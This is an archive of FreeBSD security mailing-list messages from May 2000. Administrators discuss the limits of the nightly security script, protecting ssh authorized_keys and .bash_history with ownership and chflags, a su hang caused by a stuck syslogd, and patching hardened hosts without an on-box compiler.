In-Reply-To: <391A8A3C.795C15F7@algroup.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Adam Laurie wrote: > If someone backdoors your system with an authorized key, and is > confident they can gain root from a luser account, they don't need to > go any further, and it's extremely 
likely that the change will go > unnoticed *forever* But if you have hostile local users with root access, can you even trust the output from /etc/security? I see the output from /etc/security as (somewhat) interesting statistical data, but in my opinion it should never be used for intrusion detection or be used as a serious security tool. If I can root your box, what's to stop me from falsifying the reference data in /var used by /etc/security to detect system changes? If nothing else, calling it a "security" script gives a false sense of just that. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:11:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1C2D737B612 for ; Thu, 11 May 2000 09:11:49 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id MAA17380; Thu, 11 May 2000 12:11:40 -0400 (EDT) (envelope-from wollman) Date: Thu, 11 May 2000 12:11:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200005111611.MAA17380@khavrinen.lcs.mit.edu> To: Paul Hart Cc: freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: References: <391A8A3C.795C15F7@algroup.co.uk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > If I can root your box, what's to stop me from falsifying the > reference data in /var used by /etc/security to detect system > changes? Stupidity and inexperience. Also, not all break-ins result in root compromise. -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick

From owner-freebsd-security Thu May 11 9:20:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from axl.ops.uunet.co.za (axl.ops.uunet.co.za [196.31.2.163])
    by hub.freebsd.org (Postfix) with ESMTP id B992637B612 for ;
    Thu, 11 May 2000 09:20:32 -0700 (PDT) (envelope-from sheldonh@axl.ops.uunet.co.za)
Received: from sheldonh (helo=axl.ops.uunet.co.za) by axl.ops.uunet.co.za
    with local-esmtp (Exim 3.13 #1) id 12pvh7-000DNJ-00;
    Thu, 11 May 2000 18:20:13 +0200
From: Sheldon Hearn
To: Paul Hart
Cc: Adam Laurie , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-reply-to: Your message of "Thu, 11 May 2000 10:03:38 CST."
Date: Thu, 11 May 2000 18:20:13 +0200
Message-ID: <51416.958062013@axl.ops.uunet.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 11 May 2000 10:03:38 CST, Paul Hart wrote:

> But if you have hostile local users with root access, can you even trust
> the output from /etc/security?

The nightly security run is there to assist the benevolent administrator
by highlighting things that the administrator himself (usually) has
changed that may influence the security of the system. It is in no way
suited to assisting in the tracking down of rooted machines.

So can we let this die already?

Ciao,
Sheldon.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:21:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 70EA537BAA9 for ; Thu, 11 May 2000 09:21:38 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 11 May 2000 10:21:37 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma018905; Thu, 11 May 00 10:21:23 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA08476; Thu, 11 May 2000 10:21:22 -0600 (MDT) Date: Thu, 11 May 2000 10:21:22 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Garrett Wollman Cc: freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <200005111611.MAA17380@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Garrett Wollman wrote: > Stupidity and inexperience. That's a scary thought. "Our security depends on all attackers being stupid." Shouldn't we work toward meaningful tools that cannot be subverted even by the most skilled of attackers? Not all attackers are script kiddies and it would be foolish of us to think they are. > Also, not all break-ins result in root compromise. Agreed. But this specific example did involve root compromise. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. 
hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:23:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 347A737B754 for ; Thu, 11 May 2000 09:23:29 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4BGtD405475; Thu, 11 May 2000 09:55:13 -0700 (PDT) Date: Thu, 11 May 2000 09:55:13 -0700 From: Alfred Perlstein To: Garrett Wollman Cc: Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000511095512.D4889@fw.wintelcom.net> References: <391A8A3C.795C15F7@algroup.co.uk> <200005111611.MAA17380@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200005111611.MAA17380@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Thu, May 11, 2000 at 12:11:40PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Garrett Wollman [000511 09:46] wrote: > < said: > > > If I can root your box, what's to stop me from falsifying the > > reference data in /var used by /etc/security to detect system > > changes? > > Stupidity and inexperience. That and chflags. :) > Also, not all break-ins result in root compromise. Most I've seen lately result in pretty hysterical /root/.bash_history files. 
:) -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:24:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id CC3B537B582 for ; Thu, 11 May 2000 09:24:30 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id QAA10342; Thu, 11 May 2000 16:23:29 GMT Message-ID: <391ADE81.77F6FF3A@algroup.co.uk> Date: Thu, 11 May 2000 17:23:29 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman Cc: Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output References: <391A8A3C.795C15F7@algroup.co.uk> <200005111611.MAA17380@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > If I can root your box, what's to stop me from falsifying the > > reference data in /var used by /etc/security to detect system > > changes? > > Stupidity and inexperience. Also, not all break-ins result in root > compromise. Indeed. If your box has been rooted, you're very likely stuffed. However, it will also trap things like one luser giving their mates access, or breaching company policy by adding their homegrown key etc. etc. Currently, unless you went looking, you would not even know that they had ssh access, and, as far as I'm concerned, daily/weekly/monthly etc. are just tools that regularly go looking for oddities for me, so the more they tell me the happier I am. For serious security checking, you obviously cannot rely on such scripts. 
Incidentally, I'm basing my patch on the openbsd scripts which do a much more thorough job already... cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:39:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 5767E37B574 for ; Thu, 11 May 2000 09:39:09 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id MAA17559; Thu, 11 May 2000 12:39:04 -0400 (EDT) (envelope-from wollman) Date: Thu, 11 May 2000 12:39:04 -0400 (EDT) From: Garrett Wollman Message-Id: <200005111639.MAA17559@khavrinen.lcs.mit.edu> To: Paul Hart Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: References: <200005111611.MAA17380@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > That's a scary thought. "Our security depends on all attackers being > stupid." No, not at all. Just because a security mechanism can be bypassed by an expert does not imply that it is totally useless. Security is still improved overall by being able to catch stupid attackers! > Shouldn't we work toward meaningful tools that cannot be > subverted even by the most skilled of attackers? That is certainly a worthwhile goal. However, there is a valid engineering trade-off between the value of a system and the cost of implementing more advanced security services. -GAWollman -- Garrett A. 
Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:59:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from newmail.sentex.ca (newmail.sentex.ca [207.245.238.163]) by hub.freebsd.org (Postfix) with ESMTP id 67A9537BA40; Thu, 11 May 2000 09:59:21 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by newmail.sentex.ca (8.9.3/8.9.3) with ESMTP id LAA23556; Thu, 11 May 2000 11:57:16 GMT (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA27834; Thu, 11 May 2000 12:59:19 -0400 (EDT) Message-Id: <3.0.5.32.20000511125540.019f1ea0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Thu, 11 May 2000 12:55:40 -0400 To: questions@FreeBSD.ORG From: Mike Tancsa Subject: Re: Cant su Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20000510202431.03935c20@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:30 PM 5/10/00 -0600, Ryan Thompson wrote: >Mike Tancsa wrote to questions@FreeBSD.ORG: > >> >> I have a test box that is having problems with su. If I do something like >> su username >> >> and give it the wrong password, it just hangs >> >> buildbox% su mdtancsa >> Password: >> Sorry >> >> >> And it just hangs after the sorry. Any ideas what might be going on ? 
>>
>> 3.4-STABLE FreeBSD 3.4-STABLE #0: Mon Mar 6 20:10:37 EST 2000
>>
>> ---Mike
>
>I don't see this behaviour on either of my 3.4 machines (one machine was
>updated last week. The other is running from a 2 m.o. cvsup), using
>descrypt on one.
>
>Define "hangs"... I.e., if this is on a local vty, can you switch to
>another? I assume ^C/^Z don't knock it out? Does it hang the whole box
>(can you ping/login to the machine?). Or is su the only process that's
>hanging? Can you do a ps -axl? Is the box using remote passwords?
>
>Have you changed your crypt libs around lately? Are all the links as they
>should be? Modtimes sufficiently old?
>
>Occasionally, on virtual terminals, when a program exits on failure
>(usually after it dumps core), I don't get a prompt back, and the term
>wreaks havoc with the keyboard. Usually I just kill the controlling shell
>and getty cleans up the mess :-)

It's something around this perhaps.

  UID   PID  PPID CPU PRI NI  VSZ  RSS WCHAN  STAT TT    TIME COMMAND
 1001 65053 65051   0  18  0 1372 1012 pause  Is   p4 0:00.07 -tcsh (tcsh)
    0 65062 65053 255   4 -2 1020  648 ttywri I<+  p4 0:00.01 su

ps -auxt v0
USER  PID %CPU %MEM VSZ RSS TT  STAT STARTED    TIME COMMAND
root  337  0.0  0.0   0   0 v0- Z    -       0:00.00 (login)

When I physically went to the machine this morning, V0 was indeed hosed and
in a zombie state. Is this co-incidence ? Is there any way to simulate this
issue so that I can see if the behaviour is repeatable ? Would it be because
syslog is trying to write to the console and the process is getting stuck
there ? Hmmm

Ah ha! I just went to the machine and killed syslogd, and the problem is
fixed! I guess su was writing to syslogd a "BAD su to root" message, but
syslogd could not write to /dev/console because the console getty was hosed
on ttyV0 and su just waits there indefinitely.

I haven't thought about it enough, but is there a potential for a little
denial of service ? At the very least, should su get stuck waiting for
syslog to do its thing like this ? I would say not, as I was locked out of
my box temporarily until I was able to physically get to it this morning and
login directly as root.

---Mike
------------------------------------------------------------------------
Mike Tancsa,                  tel +1 519 651 3400
Sentex Communications         mike@sentex.net
Cambridge, Ontario Canada     www.sentex.net

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 10:56:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp9.xs4all.nl (smtp9.xs4all.nl [194.109.127.52]) by hub.freebsd.org (Postfix) with ESMTP id 5F6B837BBBD for ; Thu, 11 May 2000 10:56:01 -0700 (PDT) (envelope-from frohwein@xs4all.nl)
Received: from NT2 (dc2-isdn1669.dial.xs4all.nl [194.109.154.133]) by smtp9.xs4all.nl (8.9.3/8.9.3) with SMTP id TAA10593 for ; Thu, 11 May 2000 19:55:59 +0200 (CEST)
From: "robf"
To:
Subject:
Date: Thu, 11 May 2000 20:03:40 +0200
Message-ID:
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

auth 7e9e6a57 subscribe freebsd-security frohwein@xs4all.nl

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 12: 3:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id 0B00137BA1F for ; Thu, 11 May 2000 12:03:22 -0700 (PDT) (envelope-from dwerthmu@ctg.albany.edu)
Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Thu, 11 May 2000 15:04:49 -0400
Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>
From: Derek Werthmuller
To: freebsd-security@FreeBSD.ORG
Subject: Applying patches with out a compiler
Date: Thu, 11 May 2000 15:04:41 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm interested in applying standard "Release" versions of FreeBSD without
using a compiler in the system. I generally don't advise leaving a working
compiler in say a firewall or a hardened system. I know that I can have a
separate system that I can use to connect via CVS and use that to update the
hardened systems. But doesn't that just keep my sources up to date and I
still need to build/build world every so often? Is there another way to
apply the security related patches ?

Thanks
Derek Werthmuller
Center for Technology in Government

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 12:13: 1 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smail1.register.com (smail1.register.com [209.67.50.101]) by hub.freebsd.org (Postfix) with ESMTP id E29D537BB78 for ; Thu, 11 May 2000 12:12:59 -0700 (PDT) (envelope-from nkulynych@register.com)
Received: from ix.register.com ([209.208.136.136]) by smail1.register.com (Post.Office MTA v3.5.3 release 223 ID# 0-61300U9000L3150S0V35) with SMTP id com for ; Thu, 11 May 2000 14:39:42 -0400
From: Nazar Kulynych
Organization: Register.Com Inc.
To: security@FreeBSD.ORG
Subject: high load
Date: Thu, 11 May 2000 13:39:29 -0400
X-Mailer: KMail [version 1.0.20]
Content-Type: text/plain
MIME-Version: 1.0
Message-Id: <00051113444502.00773@ix.register.com>
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

when I do rm or tar -zxf the load gets up to 5.00 on a pentium 200mmx with
48MB ram. I can't figure out what's going on

Thanx in advance

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 12:13:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from turing.csis.gvsu.edu (turing.csis.gvsu.edu [148.61.162.181]) by hub.freebsd.org (Postfix) with SMTP id 99EE637B809 for ; Thu, 11 May 2000 12:13:31 -0700 (PDT) (envelope-from matt@csis.gvsu.edu)
Received: (qmail 30111 invoked by uid 0); 11 May 2000 19:13:30 -0000
Received: from pm490-34.dialip.mich.net (HELO contempt.badmofo.net) (198.110.188.92) by csis.gvsu.edu with SMTP; 11 May 2000 19:13:30 -0000
Received: (qmail 6863 invoked by uid 500); 11 May 2000 19:15:44 -0000
From: matt@csis.gvsu.edu
Date: Thu, 11 May 2000 15:15:44 -0400
To: Derek Werthmuller
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
Message-ID: <20000511151544.A6826@contempt.badmofo.net>
References: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>; from dwerthmu@ctg.albany.edu on Thu, May 11, 2000 at 03:04:41PM -0400
X-my-OS-is-better-than-your-OS: FreeBSD 4.0-STABLE i386
X-suspicion-breeds: confidence
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It took Derek Werthmuller 17 lines to say:
> I'm interested in applying standard "Release" versions of FreeBSD without
> using a compiler in the system. I generally don't advise leaving a working
> compiler in say a firewall or a hardened system. I know that I can have a
> separate system that I can use to connect via CVS and use that to update the
> hardened systems. But doesn't that just keep my sources up to date and I
> still need to build/build world every so often? Is there another way to
> apply the security related patches ?

How about 'chmod 500 /usr/bin/{cc,ld}' and do your 'make world's as root?
If an attacker has root, using the compiler is the least of your worries.

--
matt@csis.gvsu.edu
http://www.csis.gvsu.edu/matt
03 F8 23 C5 43 A2 F7 5A 24 49 F7 B0 3A F9 B1 7F
Trying is the first step towards failure - Homer

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 13:18:46 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CD7137B556; Thu, 11 May 2000 13:18:43 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA41678; Thu, 11 May 2000 13:18:42 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 11 May 2000 13:18:42 -0700 (PDT)
From: Kris Kennaway
To: Derek Werthmuller
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 11 May 2000, Derek Werthmuller wrote:

> I'm interested in applying standard "Release" versions of FreeBSD
> without using a compiler in the system. I generally don't advise leaving a
> working compiler in say a firewall or a hardened system. I know that
> I can have a separate system that I can use to connect via CVS and use
> that to update the hardened systems. But doesn't that just keep my
> sources up to date and I still need to build/build world every so
> often? Is there another way to apply the security related patches ?

Compile on another machine, copy it over. For example, if you want to
update the entire machine to -stable, you can do a buildworld on one
machine, NFS mount the /usr/src and /usr/obj on the target, and do make
installworld there.

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 13:44:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id D851D37BA23 for ; Thu, 11 May 2000 13:44:31 -0700 (PDT) (envelope-from mark@grondar.za)
Received: from grimreaper.grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.9.3/8.9.3) with ESMTP id WAA41333; Thu, 11 May 2000 22:44:22 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za)
Message-Id: <200005112044.WAA41333@grimreaper.grondar.za>
To: Paul Hart
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
References:
In-Reply-To: ; from Paul Hart "Thu, 11 May 2000 10:21:22 CST."
Date: Thu, 11 May 2000 22:44:22 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[ Change the freaking subject already!! ]

> That's a scary thought. "Our security depends on all attackers being
> stupid." Shouldn't we work toward meaningful tools that cannot be
> subverted even by the most skilled of attackers?
> Not all attackers are script kiddies and it would be foolish of us to
> think they are.

*Bing*

for (;;)
	printf("There is no silver bullet!\n");

The only workable tool is a well-paid, paranoid security guy. The rest
are there to help the WPPSG.

M
--
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 14:15:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from overcee.netplex.com.au (peter1.yahoo.com [208.48.107.4]) by hub.freebsd.org (Postfix) with ESMTP id 3143B37BC3A for ; Thu, 11 May 2000 14:15:34 -0700 (PDT) (envelope-from peter@netplex.com.au)
Received: from netplex.com.au (localhost [127.0.0.1]) by overcee.netplex.com.au (Postfix) with ESMTP id 0C8361CD7; Thu, 11 May 2000 14:15:33 -0700 (PDT) (envelope-from peter@netplex.com.au)
X-Mailer: exmh version 2.1.1 10/15/1999
To: Alfred Perlstein
Cc: Garrett Wollman , Paul Hart , freebsd-security@FreeBSD.ORG
Subject: Re: envy.vuurwerk.nl daily run output
In-Reply-To: Message from Alfred Perlstein of "Thu, 11 May 2000 09:55:13 PDT." <20000511095512.D4889@fw.wintelcom.net>
Date: Thu, 11 May 2000 14:15:33 -0700
From: Peter Wemm
Message-Id: <20000511211533.0C8361CD7@overcee.netplex.com.au>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Alfred Perlstein wrote:
> * Garrett Wollman [000511 09:46] wrote:
> > < said:
> >
> > > If I can root your box, what's to stop me from falsifying the
> > > reference data in /var used by /etc/security to detect system
> > > changes?
> >
> > Stupidity and inexperience.
>
> That and chflags. :)
>
> > Also, not all break-ins result in root compromise.
>
> Most I've seen lately result in pretty hysterical /root/.bash_history
> files. :)

Something along the lines of 'chflags uappnd,uunlnk .bash_history' (or
system if it's root) can cause hours of fun and joy reading the history
after the event.. Sheer panic sets in pretty quickly, and then they start
looking to see what incriminating evidence they've left behind...

It has in the past turned out to be an invaluable source of clues and hints
as to what the state of the art is with the script kiddies. Usually you can
tip off a few dozen other exploited sites as well.

``script kiddies'' usually leave a trail lit up with lights and it can be
quite entertaining to see what they've tried out of ignorance. A
professional is another thing though.

Cheers,
-Peter
--
Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au
"All of this is for nothing if we don't go to the stars" - JMS/B5

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 18:17: 0 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 26ECD37BC6F for ; Thu, 11 May 2000 18:16:57 -0700 (PDT) (envelope-from jeff-ml@mountin.net)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id UAA18678; Thu, 11 May 2000 20:16:54 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-85.max1.wa.cyberlynk.net(207.227.118.85) by peak.mountin.net via smap (V1.3) id sma018676; Thu May 11 20:16:39 2000
Message-Id: <4.3.2.20000511192741.00c24ac0@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Thu, 11 May 2000 20:10:41 -0500
To: Mike Silbersack
From: "Jeffrey J. Mountin"
Subject: Re: envy.vuurwerk.nl daily run output
Cc: security@FreeBSD.ORG
In-Reply-To:
References: <20000509150609.L42267@vuurwerk.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 01:56 PM 5/10/00 -0500, Mike Silbersack wrote:
>This just got me thinking... are .ssh/authorized_keys files checked for
>changes by the security scripts? I know I probably wouldn't notice for a
>long while if someone had modified mine, all the time during which someone
>could be playing around on the box.

You could always force the ownership of .ssh/ and any files under it to
root. This adds some administrative overhead, but then to change
authorized_keys they already have root and you have a bigger fish to fry.

The only thing that needed to change for openssh is the file permissions.
With ssh from ports the .ssh directory and files could be owned by root
with the same group as the user:

.ssh/                   root: mode 510
.ssh/authorized_keys    root: mode 440

With openssh in the base system the modes must be 511 and 444 in order for
RSA authentication to work in contradiction with the suggestions in sshd(8).

In any case you can make it more difficult. Combining chflags and the
secure level would make it even harder, but then you have an administrative
nightmare to modify existing files.

Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 11 19:21:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail3.gmx.net (mail.gmx.net [194.221.183.63]) by hub.freebsd.org (Postfix) with SMTP id 974CA37B94D for ; Thu, 11 May 2000 19:21:21 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 10370 invoked by uid 0); 12 May 2000 02:21:18 -0000
Received: from p3e9e7a25.dip.t-dialin.net (HELO speedy.gsinet) (62.158.122.37) by mail.gmx.net with SMTP; 12 May 2000 02:21:18 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA02561 for freebsd-security@FreeBSD.ORG; Thu, 11 May 2000 21:42:59 +0200
Date: Thu, 11 May 2000 21:42:59 +0200
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Applying patches with out a compiler
Message-ID: <20000511214259.A1453@speedy.gsinet>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>; from dwerthmu@ctg.albany.edu on Thu, May 11, 2000 at 03:04:41PM -0400
Organization: System Defenestrators Inc.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, May 11, 2000 at 15:04 -0400, Derek Werthmuller wrote:
> I'm interested in applying standard "Release" versions of
> FreeBSD without using a compiler in the system.

You might want to read the "Server Farm" thread on -stable
running since two(?) days, talking about "make installworld"
based on "make buildworld" output generated somewhere else. At
least it did in the beginning. :)

But this solution assumes you're not scared of running the
machine as a network filesystem client (no matter if NFS or
something different). But this is only needed at upgrade time.

